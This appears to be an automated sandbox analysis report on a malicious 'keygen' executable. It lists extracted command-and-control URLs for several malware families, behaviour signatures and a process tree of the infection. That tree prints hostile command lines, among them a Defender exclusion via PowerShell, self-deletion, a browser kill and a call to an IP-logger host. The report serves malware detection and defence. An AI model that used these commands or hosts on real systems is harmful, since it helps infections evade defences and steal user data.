Analysis
-
max time kernel
43s -
max time network
600s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
General
-
Target
keygen-step-4.exe
-
Size
6.3MB
-
MD5
5f6a71ec27ed36a11d17e0989ffb0382
-
SHA1
a66b0e4d8ba90fc97e4d5eb37d7fbc12ade9a556
-
SHA256
a546a1f257585e2f4c093db2b7eeb6413a314ffb1296d97fd31d0363e827cc65
-
SHA512
d67e0f1627e5416aef1185aea2125c8502aac02b6d3e8eec301e344f5074bfce8b2aded37b2730a65c04b95b1ba6151e79048642ef1d0c9b32702f919b42f7b4
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://labsclub.com/welcome
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
e71b51d358b75fe1407b56bf2284e3fac50c860f
Attributes
-
url4cnc
https://telete.in/oidmrwednesday
rc4.plain
rc4.plain
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Extracted
Family
buer
C2
securedocumentsholding.com
Signatures
-
Buer
Buer is a new modular loader first seen in August 2019.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
ElysiumStealer Payload 3 IoCs
-
ElysiumStealer Support DLL 1 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Buer Loader 1 IoCs
Detects Buer loader in memory or disk.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 6 IoCs
-
XMRig Miner Payload 1 IoCs
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 23 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
themida 3 IoCs
Detects Themida, Advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks for any installed AV software in registry 1 TTPs 53 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 37 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 13 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs ping.exe 1 TTPs 4 IoCs
-
Script User-Agent 26 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp13⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1615014376525.exe"C:\Users\Admin\AppData\Roaming\1615014376525.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014376525.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1615014382432.exe"C:\Users\Admin\AppData\Roaming\1615014382432.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014382432.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
-
-
C:\Users\Admin\AppData\Roaming\1615014388650.exe"C:\Users\Admin\AppData\Roaming\1615014388650.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014388650.txt"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2G9P6.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-2G9P6.tmp\23E04C4F32EF2158.tmp" /SL5="$2048A,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent5⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"6⤵
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s16⤵
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp13⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe" 0 3060197d33d91c80.94013368 0 1013⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe" 1 3.1615014594.60432ac2091c9 1014⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe" 2 3.1615014594.60432ac2091c95⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\rxwgbknqu0u\vict.exe"C:\Users\Admin\AppData\Local\Temp\rxwgbknqu0u\vict.exe" /VERYSILENT /id=5356⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OCBSP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-OCBSP.tmp\vict.tmp" /SL5="$301F4,870426,780800,C:\Users\Admin\AppData\Local\Temp\rxwgbknqu0u\vict.exe" /VERYSILENT /id=5357⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\jivgl1xuyn4\safebits.exe"C:\Users\Admin\AppData\Local\Temp\jivgl1xuyn4\safebits.exe" /S /pubid=1 /subid=4516⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\jivgl1xuyn4\safebits.exe7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1dhfpscsjws\sspltvlam4o.exe"C:\Users\Admin\AppData\Local\Temp\1dhfpscsjws\sspltvlam4o.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6027E.tmp\sspltvlam4o.tmp"C:\Users\Admin\AppData\Local\Temp\is-6027E.tmp\sspltvlam4o.tmp" /SL5="$1022E,870426,780800,C:\Users\Admin\AppData\Local\Temp\1dhfpscsjws\sspltvlam4o.exe" /VERYSILENT7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\rn5pdbb0nrv\yozvzfgirqj.exe"C:\Users\Admin\AppData\Local\Temp\rn5pdbb0nrv\yozvzfgirqj.exe" 57a764d042bf86⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\J4PI14RFP3\J4PI14RFP.exe" 57a764d042bf8 & exit7⤵
-
C:\Program Files\J4PI14RFP3\J4PI14RFP.exe"C:\Program Files\J4PI14RFP3\J4PI14RFP.exe" 57a764d042bf88⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\prv0skbobj5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\prv0skbobj5\Setup3310.exe" /Verysilent /subid=5776⤵
-
C:\Users\Admin\AppData\Local\Temp\is-14KLB.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-14KLB.tmp\Setup3310.tmp" /SL5="$20226,802346,56832,C:\Users\Admin\AppData\Local\Temp\prv0skbobj5\Setup3310.exe" /Verysilent /subid=5777⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\nxvv12hvwik\ghr1p3sejjt.exe"C:\Users\Admin\AppData\Local\Temp\nxvv12hvwik\ghr1p3sejjt.exe" testparams6⤵
-
C:\Users\Admin\AppData\Roaming\uixypn1nshu\moyah0k4v2a.exe"C:\Users\Admin\AppData\Roaming\uixypn1nshu\moyah0k4v2a.exe" /VERYSILENT /p=testparams7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ezzpyg5m4dw\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ezzpyg5m4dw\vpn.exe" /silent /subid=4826⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S638F.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-S638F.tmp\vpn.tmp" /SL5="$1023C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ezzpyg5m4dw\vpn.exe" /silent /subid=4827⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "8⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09019⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "8⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09019⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall8⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install8⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0mycpgirvyk\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\0mycpgirvyk\askinstall24.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3alus5hiqn\tcwg1yr12wc.exe"C:\Users\Admin\AppData\Local\Temp\v3alus5hiqn\tcwg1yr12wc.exe" /ustwo INSTALL6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 6567⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 6447⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 7247⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 8207⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 8767⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 9447⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 10807⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\wx4ao4zcj2u\app.exe"C:\Users\Admin\AppData\Local\Temp\wx4ao4zcj2u\app.exe" /8-236⤵
-
C:\Program Files (x86)\Shy-Morning\7za.exe"C:\Program Files (x86)\Shy-Morning\7za.exe" e -p154.61.71.51 winamp-plugins.7z7⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Morning\app.exe" -map "C:\Program Files (x86)\Shy-Morning\WinmonProcessMonitor.sys""7⤵
-
C:\Program Files (x86)\Shy-Morning\app.exe"C:\Program Files (x86)\Shy-Morning\app.exe" -map "C:\Program Files (x86)\Shy-Morning\WinmonProcessMonitor.sys"8⤵
-
-
-
C:\Program Files (x86)\Shy-Morning\7za.exe"C:\Program Files (x86)\Shy-Morning\7za.exe" e -p154.61.71.51 winamp.7z7⤵
-
-
C:\Program Files (x86)\Shy-Morning\app.exe"C:\Program Files (x86)\Shy-Morning\app.exe" /8-237⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\aespuai3xt5\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\aespuai3xt5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\si5vnkqhco4\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\si5vnkqhco4\chashepro3.exe" /VERYSILENT6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\cpb4s4ekag0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cpb4s4ekag0\Setup3310.exe" /Verysilent /subid=5776⤵
-
C:\Users\Admin\AppData\Local\Temp\is-782L8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-782L8.tmp\Setup3310.tmp" /SL5="$605E6,802346,56832,C:\Users\Admin\AppData\Local\Temp\cpb4s4ekag0\Setup3310.exe" /Verysilent /subid=5777⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9LRE6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9LRE6.tmp\Setup.exe" /Verysilent8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3G4UK.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3G4UK.tmp\Setup.tmp" /SL5="$2065E,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-9LRE6.tmp\Setup.exe" /Verysilent9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\ProPlugin.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IJKLQ.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-IJKLQ.tmp\ProPlugin.tmp" /SL5="$10782,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\ProPlugin.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MHEEU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MHEEU.tmp\Setup.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"13⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\PictureLAb.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NNLJ1.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-NNLJ1.tmp\PictureLAb.tmp" /SL5="$A02E0,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\PictureLAb.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7P077.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7P077.tmp\Setup.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CJIAM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CJIAM.tmp\Setup.tmp" /SL5="$60694,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-7P077.tmp\Setup.exe" /VERYSILENT13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S98EV.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-S98EV.tmp\kkkk.exe" /S /UID=lab21414⤵
-
C:\Users\Admin\AppData\Local\Temp\80-a1d0b-702-dedaf-516fe61794703\Pybenaeduqi.exe"C:\Users\Admin\AppData\Local\Temp\80-a1d0b-702-dedaf-516fe61794703\Pybenaeduqi.exe"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vvsdx2yp.vti\GcleanerWW.exe /mixone & exit16⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exe & exit16⤵
-
C:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exe17⤵
-
C:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exe18⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2kpjuba2.gyn\setup.exe /8-2222 & exit16⤵
-
C:\Users\Admin\AppData\Local\Temp\2kpjuba2.gyn\setup.exeC:\Users\Admin\AppData\Local\Temp\2kpjuba2.gyn\setup.exe /8-222217⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Resonance"18⤵
-
-
C:\Program Files (x86)\Young-Resonance\7za.exe"C:\Program Files (x86)\Young-Resonance\7za.exe" e -p154.61.71.51 winamp-plugins.7z18⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Young-Resonance\setup.exe" -map "C:\Program Files (x86)\Young-Resonance\WinmonProcessMonitor.sys""18⤵
-
C:\Program Files (x86)\Young-Resonance\setup.exe"C:\Program Files (x86)\Young-Resonance\setup.exe" -map "C:\Program Files (x86)\Young-Resonance\WinmonProcessMonitor.sys"19⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1p4yaa0n.c2d\MultitimerFour.exe & exit16⤵
-
C:\Users\Admin\AppData\Local\Temp\1p4yaa0n.c2d\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\1p4yaa0n.c2d\MultitimerFour.exe17⤵
-
C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10418⤵
-
C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe" 1 3.1615015051.60432c8bbe43d 10419⤵
-
C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe" 2 3.1615015051.60432c8bbe43d20⤵
-
C:\Users\Admin\AppData\Local\Temp\5yfu5bxeor2\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\5yfu5bxeor2\chashepro3.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BFMEA.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-BFMEA.tmp\chashepro3.tmp" /SL5="$50994,2015144,58368,C:\Users\Admin\AppData\Local\Temp\5yfu5bxeor2\chashepro3.exe" /VERYSILENT22⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\gmxy14tfz54\d4oc3ftx3um.exe"C:\Users\Admin\AppData\Local\Temp\gmxy14tfz54\d4oc3ftx3um.exe" /ustwo INSTALL21⤵
-
-
C:\Users\Admin\AppData\Local\Temp\pxhjiddrb2a\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pxhjiddrb2a\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ND199.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-ND199.tmp\Setup3310.tmp" /SL5="$40992,802346,56832,C:\Users\Admin\AppData\Local\Temp\pxhjiddrb2a\Setup3310.exe" /Verysilent /subid=57722⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7HDTO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7HDTO.tmp\Setup.exe" /Verysilent23⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DFF2K.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFF2K.tmp\Setup.tmp" /SL5="$30A6A,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-7HDTO.tmp\Setup.exe" /Verysilent24⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KILCR.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-KILCR.tmp\ProPlugin.exe" /Verysilent25⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\024eeji5cno\safebits.exe"C:\Users\Admin\AppData\Local\Temp\024eeji5cno\safebits.exe" /S /pubid=1 /subid=45121⤵
-
-
C:\Users\Admin\AppData\Local\Temp\wks5cxwnlf5\vict.exe"C:\Users\Admin\AppData\Local\Temp\wks5cxwnlf5\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T1C7S.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-T1C7S.tmp\vict.tmp" /SL5="$10ACA,870426,780800,C:\Users\Admin\AppData\Local\Temp\wks5cxwnlf5\vict.exe" /VERYSILENT /id=53522⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S4QN3.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-S4QN3.tmp\wimapi.exe" 53523⤵
-
-
-
-
